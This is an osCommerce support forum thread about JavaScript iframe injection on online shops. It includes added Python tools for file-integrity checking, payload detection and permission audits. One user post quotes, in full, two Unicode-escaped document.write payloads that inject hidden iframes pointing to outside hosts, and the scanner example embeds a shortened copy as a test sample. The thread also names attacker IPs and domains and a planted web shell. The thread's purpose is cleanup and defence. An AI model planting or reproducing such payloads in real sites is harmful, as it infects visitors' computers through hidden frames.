osCommerce

Hacker warning


Jack_mcs


There is a hot new hacking attempt making the rounds lately called Javascript iframe injection. The hacker injects code into your files which they then use to try to obtain all sorts of information about your shop, server and your visitors computer. They probably can't get too much information on a properly setup server but there are a lot out there that are not setup properly.

 

Besides the above, one of the effects this code has is that it causes Google to list your site with a message that says, "This site may harm your computer." Google is using the results of a company named stopbadware.org, which checks websites for this type of code. If they find it, they will then report it to Google, who in turn adds the warning about your site. However, neither of them will notify the shop owner about it, so your site could be infected and listed with a serious warning and you wouldn't know it until you noticed the listing on Google.

 

To check if your site is infected, search your files for

- iframe (not used in most oscommerce shops)

- a line of code that starts with <script language="JavaScript">e

- a string of letters like AAAAAAAA

 

Any of the above could be in an oscommerce shop legitimately, although it is probably unlikely. If it is, then you need to look closer at the code to see if it belongs there. Keeping a known, good backup of your files on your computer to compare against is always a good idea.

 

Jack

Support Links:

For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc.

All of My Addons

Get the latest versions of my addons

Recommended SEO Addons


Thanks for the notice. I also recall there was one contribution that would email the store owner anytime a file has been changed. I couldn't quite locate it, but will keep looking.


Installed Contributions: CCGV, Close Popup, Dynamic Meta Tags, Easy Populate, Froogle Data Feeder, Google Position, Infobox Header Entire Row, Live Support for OSC, PayPal Seal with CC images, Report_m Sales, Shop by Price Revised, SQL Updater, Who's Online Enhancement, Footer, GNA EP Assistant and still going.


Can you give a scenario of a bad setup where a hacker could inject code into a file? Or could you list common gotchas to look out for that store owners should fix? Also, say if I am Joe Average with computers and I would just take the default install of osCommerce over a default install of Linux without tinkering with any permission setting, then would I be exposed to this new hacking attempt? Sorry for all these questions, and how about the impact if the server had PHP safe_mode turned on or off? Any info would be useful... Thx! Tim


The default install of osCommerce, if downloaded from here, has many of the security holes patched, so that's a good start. But there are many settings on the server that can leave it open to security breaches. I'm not sure what you mean by a default Linux install. Hopefully no host would use a default install. There are all sorts of injection techniques that will allow a hacker access. Many of those were fixed by the osCommerce patches, and that is the main reason for turning off register_globals. As for reasons and examples regarding the server, go to Google and search for "Javascript iframe injection." You should also read through the stopbadware.org site. They may even have a support forum.

 

Jack


  • 2 months later...

Our research has shown a lot of this relates to stolen FTP passwords.

 

There is a PC-based virus going around too that steals FTP passwords stored in FTP programs. I've seen a file listing about 50 site FTP addresses, and it is rumoured such files are shared by hackers.

 

So it is not always a server based flaw that is leading the attack.


So far all evidence points to ftp access without brute force. Meaning they somehow get the ftp passwords. It is an automated hack which will return unless you change your ftp password. Changing it appears to stop it which indicates that they don't in fact have real server access.

 

They attack all index files: index.php, .html, .bak. They have also started to attack login.php.

 

We recommend the contribution Site Monitor as one way of knowing an attack has occurred.

 

We have seen instances where they load a script such as phpremoteview (renamed so you won't recognize it). But it is not 100% clear what that aids.

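Site Monitor itself is not reproduced here. What follows is an added example of the same idea, written for this thread and not code from that contribution, from osCommerce, or from any poster: hash every file of a known-good copy of the shop (the "known, good backup" the first post recommends keeping), store the manifest, and later compare the live tree against it so an edited index.php or login.php, or a script dropped into a writeable directory, is reported even if its datestamp was tampered with. The demo() function builds a small constructed shop in a temporary directory; the function names and the sample file contents are this example's own.

```python
"""Baseline-and-compare integrity check for a shop's document root.

Added example for the forum thread above; not Site Monitor and not osCommerce code.
"""
import hashlib
import json
import tempfile
from pathlib import Path


def build_manifest(root):
    """Map relative POSIX path -> SHA-256 hex digest for every regular file under root."""
    root = Path(root)
    manifest = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            h = hashlib.sha256()
            with path.open("rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            manifest[path.relative_to(root).as_posix()] = h.hexdigest()
    return manifest


def save_manifest(manifest, out_file):
    """Persist the baseline; keep this file OFF the web server (an attacker with
    FTP access could otherwise rewrite it along with the injected pages)."""
    Path(out_file).write_text(json.dumps(manifest, indent=1, sort_keys=True))


def load_manifest(in_file):
    return json.loads(Path(in_file).read_text())


def compare_manifests(baseline, current):
    """Return {'added': [...], 'removed': [...], 'modified': [...]} of relative paths."""
    base_keys, cur_keys = set(baseline), set(current)
    return {
        "added": sorted(cur_keys - base_keys),
        "removed": sorted(base_keys - cur_keys),
        "modified": sorted(p for p in base_keys & cur_keys if baseline[p] != current[p]),
    }


def check_tree(root, baseline):
    """Hash the live tree and diff it against a stored baseline."""
    return compare_manifests(baseline, build_manifest(root))


def demo():
    """Constructed demonstration: tiny fake shop, baseline, then a simulated
    injection of the kind described in the thread (index.php edited, a new
    script appearing in a writeable directory)."""
    with tempfile.TemporaryDirectory() as tmp:
        shop = Path(tmp) / "catalog"
        (shop / "admin").mkdir(parents=True)
        (shop / "index.php").write_text("<?php require('includes/application_top.php'); ?>")
        (shop / "login.php").write_text("<?php /* login page */ ?>")
        (shop / "admin" / "index.php").write_text("<?php /* admin page */ ?>")
        baseline = build_manifest(shop)

        # Simulated attack (constructed, not a real payload).
        (shop / "index.php").write_text(
            "<?php require('includes/application_top.php'); ?>"
            "<iframe src='http://example.invalid/' width='1' height='1'></iframe>"
        )
        (shop / "pub").mkdir()
        (shop / "pub" / "x.php").write_text("<?php /* dropped script */ ?>")
        return check_tree(shop, baseline)


if __name__ == "__main__":
    print(demo())
```

In practice you would run build_manifest() once against the clean download, save_manifest() to a file on your own PC, and run check_tree() from a cron job or after every upload; anything in "added" or "modified" that you did not change yourself is where to look first.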

  • 4 months later...

ok guys, I think I got injected with some iframe crap that tries to redirect customers to this address: 217.107.218.147

 

I am currently running diagnostics on all my files and comparing them with previous backups done at different points in time. When I check the DOM of my home page, it shows an iframe entry redirecting to that malicious IP address above. Where should I go to look for that iframe entry? I checked the language files but with no success.

 

Any suggestions?


Also, the injection worked but the redirecting does not happen. The clients do not get forwarded to that address. It seems I've done a fairly decent job at securing my oscommerce site. But the fact that its still there bothers me and makes me a little paranoid.


The best thing to do is download your complete shop and search all of the files. The changes are usually in files in the root but they could be elsewhere.

 

Jack


I can't find anything in my files pertaining to the address that is redirecting the browsers to 217.107.218.147

 

When I view my site with firefox that address appears at the bottom left but does not redirect. When I open with ie7, it redirects.

 

So I renamed my index.php and have a temporary out of service index.html in its place. And I am still being redirected. ( if my files were actually infected. Having renamed the index.php and replaced it with a very simple index.html should avoid traffic redirection right?)

 

I started to believe that this was a local infection, either on the local network in my office (4 computers) or from the hosting company's network. None of my anti-virus/adware scanners are detecting anything. My router log shows that every time I connect to my site, traffic is redirected to that malicious IP. But when I connect to other sites like google or starcraft.org, I do not get redirected. I believe this proves that my network is not at fault (well, I'm hoping here guys).

 

I have no idea where else to look. I'm going to do some research on this later tonight and see if maybe it's possible that my host is the one that is actually infected.


If you Google that IP address you get a lot of info.

 

All the links seem to be 3 yrs. old though.

 

I read a few, and they said it's a server side infection via a JavaScript.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help


I can't find anything in my files pertaining to the address that is redirecting the browsers to 217.107.218.147
Many times the files/code the hackers load is encrypted, so you can't just search for something like an IP and find it each time.

 

Jack


I've googled the IP and looked up every possibility mentioned in the search results as far as iframe injections through Java, server exploits, and so on.

 

I searched my oscommerce files for anything/everything related to iframe, the ip in question or any malicious javascript code like jack mentioned in the first post and I did not find anything.

 

I really doubt it's an iframe injection on my php files now. Unless I'm looking in the wrong places and for the wrong things. I am starting to lean towards a possible IE & Firefox infection on the local network at work; maybe I have some die-hard spyware that I just haven't caught yet. I'm at home now and can view the site just fine, I don't get redirected and don't experience any of the symptoms that I see when I'm at work. This is freaking mind boggling. Funny thing is right before I left work today, everything started working just fine. I'm going in tomorrow to look into it some more. It worries me that sh!t might not be set up properly.


If you need any help checking for "spyware" and "browser hijacks" I can be of service.

 

I've got 4 years experience and almost 13,000 posts at a popular spyware removal forum helping people with such problems.

 

I was a "Teacher" there for a while teaching others the "tricks of the trade".


  • 1 month later...

I've just received an email today from Google Search Quality, I was unsure of its authenticity until I searched this site and found this thread. this is part of the email: Dear site owner or webmaster of xxxxxxx.co.uk

 

We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.

 

I've xxxxx'd out my website address as I wouldn't want anyone's computer infected by anything by visiting my site.

 

I'm completely clueless when it comes to this but I'm going through all my php files to see if I can find anything suspicious. I had noticed for a few days prior to receiving this email when visiting my site it would hang for ages and I had to keep closing down and restarting, I should have realised something was wrong then :-" :angry:

 

I've brought up my website several times and opened various pages and all seems ok and is running ok so I'm not sure if there is still a problem or not ?


Update:

 

just tried to bring my site up on IE (usually use FF) and my site freezes, in the bottom left hand side it says; waiting for http://froz-soft.net/j3/index.php... no idea what this is?

 

I also get a pop up on the top of the page that says; this website wants to run the following add-on: microsoft data access - remote data services dat' from microsoft corporation - if you trust the website and the add-on and want to allow it to run, click here

 

I'm afraid I have real issues with my site and hope someone can offer some advice or assistance with this.

 

Many thanks


I've just located and removed these 2 instances of codes in index.php which looked suspicious

 

<body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0"><!-- o65 --><script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0027\u0068\
u0074\u0074\u0070\u003a\u002f\u002f\u0067\u006f\u006c\u0075\u006d\u002e\u0069\u006e\u0066\u006f\u002f\u0027\u0020\u0077\u0069\
u0064\u0074\u0068\u003d\u0027\u0031\u0027\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0027\u0031\u0027\u0020\u0073\
u0074\u0079\u006c\u0065\u003d\u0027\u0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u003a\u0020\u0068\u0069\
u0064\u0064\u0065\u006e\u003b\u0027\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script><!-- c65 -->
<!-- header //-->

<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074
\u0074\u0070\u003a\u002f\u002f\u0073\u0074\u0061\u0074\u002d\u0067\u006f\u006f\u0067\u006c\u0065\u002e\u0063\u006f\u006d\u002f\u0063
\u006f\u0075\u006e\u0074\u0065\u0072\u002f\u006f\u0075\u0074\u002e\u0070\u0068\u0070\u003f\u0073\u005f\u0069\u0064\u003d\u0031\u0022
\u0020\u0066\u0072\u0061\u006d\u0065\u0062\u006f\u0072\u0064\u0065\u0072\u003d\u0022\u0030\u0022\u0020\u0062\u006f\u0072\u0064\u0065
\u0072\u003d\u0022\u0030\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074
\u003d\u0022\u0030\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0070\u006f\u0073\u0069\u0074\u0069\u006f\u006e\u003a\u0020
\u0061\u0062\u0073\u006f\u006c\u0075\u0074\u0065\u003b\u0020\u0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u003a\u0020
\u0068\u0069\u0064\u0064\u0065\u006e\u003b\u0020\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u0020\u006e\u006f\u006e\u0065
\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>

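The search list in the first post ("iframe", a line starting <script language="JavaScript">e, a run of AAAAAAAA) and the escaped payload just posted call for the same tool, so here is one added example serving both. It is not code from the thread, from osCommerce or from any contribution. It walks a downloaded copy of the shop, first undoes the \uXXXX escaping that the injected document.write() uses (and backslash line continuations), and only then matches the indicators, so the hidden <iframe> is found as plain text even though the bytes on disk never contain the word "iframe". SAMPLE_INJECTED is a constructed, shortened copy of the first payload above (the width/height/style attributes are dropped); the indicator names, file suffix list and function names are this example's own.

```python
"""Scan a copy of an osCommerce shop for injected, \\u-escaped iframe payloads.

Added example for the forum thread above; not code from the thread or from osCommerce.
"""
import re
import sys
from pathlib import Path

# Indicators named in the thread plus two that only appear after decoding.
INDICATORS = [
    ("iframe", re.compile(r"<iframe\b", re.I)),
    ("script-lang-js", re.compile(r'<script\s+language=["\']JavaScript["\']>\s*e', re.I)),
    ("long-A-run", re.compile(r"A{8,}")),
    ("document-write", re.compile(r"document\.write\s*\(", re.I)),
    ("hidden-frame", re.compile(r"visibility:\s*hidden|display:\s*none", re.I)),
]

_UESC = re.compile(r"\\u([0-9a-fA-F]{4})")   # \u003c etc.
_LINECONT = re.compile(r"\\\r?\n")            # backslash-newline inside a JS string


def decode_js_escapes(text):
    """Turn the obfuscated document.write('\\u003c...') string back into HTML."""
    text = _LINECONT.sub("", text)
    return _UESC.sub(lambda m: chr(int(m.group(1), 16)), text)


def scan_text(text):
    """Return [(indicator, snippet), ...] for one file's contents, matched after decoding."""
    decoded = decode_js_escapes(text)
    hits = []
    for name, rx in INDICATORS:
        for m in rx.finditer(decoded):
            hits.append((name, decoded[m.start():m.start() + 80]))
    return hits


def extract_iframe_srcs(text):
    """List the src of every iframe found after decoding, so you can see where the
    injected frame points without loading the page in a browser."""
    decoded = decode_js_escapes(text)
    return re.findall(r"<iframe[^>]*\bsrc=['\"]([^'\"]+)['\"]", decoded, re.I)


def scan_tree(root, suffixes=(".php", ".html", ".htm", ".js", ".bak")):
    """Walk a downloaded copy of the shop; map file path -> hits for files with any hit.
    .bak is included because the thread reports index.bak being hit too."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            try:
                text = path.read_text(errors="replace")
            except OSError:
                continue
            hits = scan_text(text)
            if hits:
                report[str(path)] = hits
    return report


# Constructed sample: shortened form of the first payload posted above, written the
# way it appears on disk (the \\u sequences are literal text, not Python escapes).
SAMPLE_INJECTED = (
    "<body marginwidth=\"0\"><!-- o65 --><script type=\"text/javascript\">"
    "document.write('\\u003c\\u0069\\u0066\\u0072\\u0061\\u006d\\u0065\\u0020"
    "\\u0073\\u0072\\u0063\\u003d\\u0027\\u0068\\u0074\\u0074\\u0070\\u003a\\u002f"
    "\\u002f\\u0067\\u006f\\u006c\\u0075\\u006d\\u002e\\u0069\\u006e\\u0066\\u006f"
    "\\u002f\\u0027\\u0020\\u0077\\u0069\\u0064\\u0074\\u0068\\u003d\\u0027\\u0031"
    "\\u0027\\u003e\\u003c\\u002f\\u0069\\u0066\\u0072\\u0061\\u006d\\u0065\\u003e')"
    "</script><!-- c65 -->\n<!-- header //-->\n"
)

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for f, hits in scan_tree(sys.argv[1]).items():
            print(f, sorted({h[0] for h in hits}))
    else:
        print(extract_iframe_srcs(SAMPLE_INJECTED))
```

Run it as python scan.py /path/to/downloaded/shop; with no argument it decodes the constructed sample and prints the frame's src. Because matching happens after decoding, the second posted variant, which hides its frame with position: absolute; display: none, is caught by the same hidden-frame rule, and a payload that an attacker splits across lines with trailing backslashes is reassembled before matching.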

This is the typical result of a hack like I originally mentioned. You should remove any code that is not right. It can be difficult to know what that is, but what you found in index.php is suspicious, to say the least. You can also use your cPanel or admin file managers to look at the datestamps. Changed files may show up this way. Also look in any directories that are writeable, like pub and tmp, for scripts that are not part of the shop.

 

Jack


Thanks Jack,

 

I've found the codes in login.php too and removed those, my site still freezes in IE so there's obviously more problems so I'm slowly and thoroughly going through all files and folders.


Your ongoing problem is - how did they get the code into the site in the first place?

 

Until you know that they'll be able to do it again and your work will be wasted.

 

1. Change all user names and passwords, including the db user (don't forget the configure.php file entries).

 

2. Make sure your site uses at least osCommerce 2.2 MS2 (060817), and if it doesn't then upgrade.

 

3. Make sure that no folder has permissions above 755. If your hosting requires permissions of 777 on folders then move hosting.

 

4. Delete the filemanager.php file from your osCommerce admin panel.

 

5. Rename the 'admin' folder to something unique (not 'admin2' or 'newadmin'), and then change the entries for /admin/ in admin/includes/configure.php to /new_name/

 

6. Password Protect the renamed 'admin' folder with a new user and password.

 

7. Run a full virus scan, Malware and SpyBot scan on your PC and any PC which is used to FTP files to the site - as this may be the source of the injection.

 

Vger


Hi Vger,

 

I'm completely at a loss as to how access was gained; all files were/are set to 755. I've even found the codes in admin/index.php. Admin is and always has been password protected through cPanel so I'm thrown by that one?

 

I've gone through all files/folders and deleted all instances of codes that look suspicious but I think theres something else somewhere and I can't for the life of me see what or where!

 

Don't know if this makes any difference or not, but my main site has a dedicated IP and I have another site I'm building hosted on my server with a non-dedicated IP, but they've managed to get the codes into both sites in the same files.

 

I'll now do all you've suggested and just hope I can clear up this mess!

 

Many thanks for your help


Unfortunately cPanel has no jailed root and is exploited around 3-4 times a year - so when a new cPanel exploit is about and the server hasn't yet been patched they can get into any site via the server.

 

By the way, I hope it was a typo on your part but files should not be 755, only folders. Files should be 644.

 

Vger

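Vger's checklist above (folders no more permissive than 755, files 644, filemanager.php deleted, the admin folder renamed and password protected) can be checked mechanically. The script below is an added example written for this thread, not code from osCommerce or from any poster. It reports every directory above 755 and every file above 644, and flags an admin folder that still has the default name, still contains filemanager.php, or has no .htaccess in it (the .htaccess check is a heuristic of this example: cPanel's directory password protection normally works through an .htaccess file, but a host could configure Apache auth elsewhere). The demo() function builds a constructed shop in a temporary directory with deliberate offenders; the function names are this example's own.

```python
"""Permission and admin-folder audit for an osCommerce tree.

Added example for the forum thread above; not osCommerce code.
"""
import os
import stat
import tempfile
from pathlib import Path

MAX_DIR_MODE = 0o755    # from the thread: folders never above 755
MAX_FILE_MODE = 0o644   # from the thread: files should be 644


def too_permissive(mode, limit):
    """True if mode grants any permission bit that limit does not grant."""
    return bool((mode & 0o777) & ~limit)


def audit_permissions(root):
    """Return [(relative_path, '0oNNN', 'dir'|'file'), ...] for every offender.
    Symlinks are skipped: their own mode bits are meaningless on most systems."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        st = path.lstat()
        if stat.S_ISLNK(st.st_mode):
            continue
        kind = "dir" if stat.S_ISDIR(st.st_mode) else "file"
        limit = MAX_DIR_MODE if kind == "dir" else MAX_FILE_MODE
        if too_permissive(st.st_mode, limit):
            findings.append((path.relative_to(root).as_posix(), oct(st.st_mode & 0o777), kind))
    return findings


def audit_admin(root, admin_dir="admin"):
    """Checks 4, 5 and 6 of the list: filemanager.php gone, folder renamed, folder protected."""
    admin = Path(root) / admin_dir
    issues = []
    if not admin.is_dir():
        return issues
    if admin_dir == "admin":
        issues.append("admin folder still has the default name 'admin'; rename it")
    if (admin / "filemanager.php").exists():
        issues.append("admin/filemanager.php is present; delete it")
    if not (admin / ".htaccess").exists():
        # Heuristic (this example's assumption): cPanel password protection
        # normally drops an .htaccess here; absence is worth a manual check.
        issues.append("no .htaccess in the admin folder; is it password protected?")
    return issues


def demo():
    """Constructed shop with two permission offenders and an unhardened admin folder."""
    with tempfile.TemporaryDirectory() as tmp:
        shop = Path(tmp) / "catalog"
        (shop / "admin").mkdir(parents=True)
        (shop / "images").mkdir()
        (shop / "index.php").write_text("<?php /* front page */ ?>")
        (shop / "admin" / "filemanager.php").write_text("<?php /* file manager */ ?>")
        os.chmod(shop / "admin", 0o755)                       # fine
        os.chmod(shop / "images", 0o777)                      # offender: world-writable dir
        os.chmod(shop / "index.php", 0o644)                   # fine
        os.chmod(shop / "admin" / "filemanager.php", 0o755)   # offender: file above 644
        return audit_permissions(shop), audit_admin(shop)


if __name__ == "__main__":
    perms, admin = demo()
    for rel, mode, kind in perms:
        print(f"{kind:4} {mode} {rel}")
    for issue in admin:
        print("admin:", issue)
```

Point audit_permissions() and audit_admin() at the real document root (and pass the renamed admin folder's name as admin_dir once you have renamed it). A 777 directory is what the poster above found on the hosts that required it; it lets any other account on a shared server, or any process the web server runs as, write files there.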
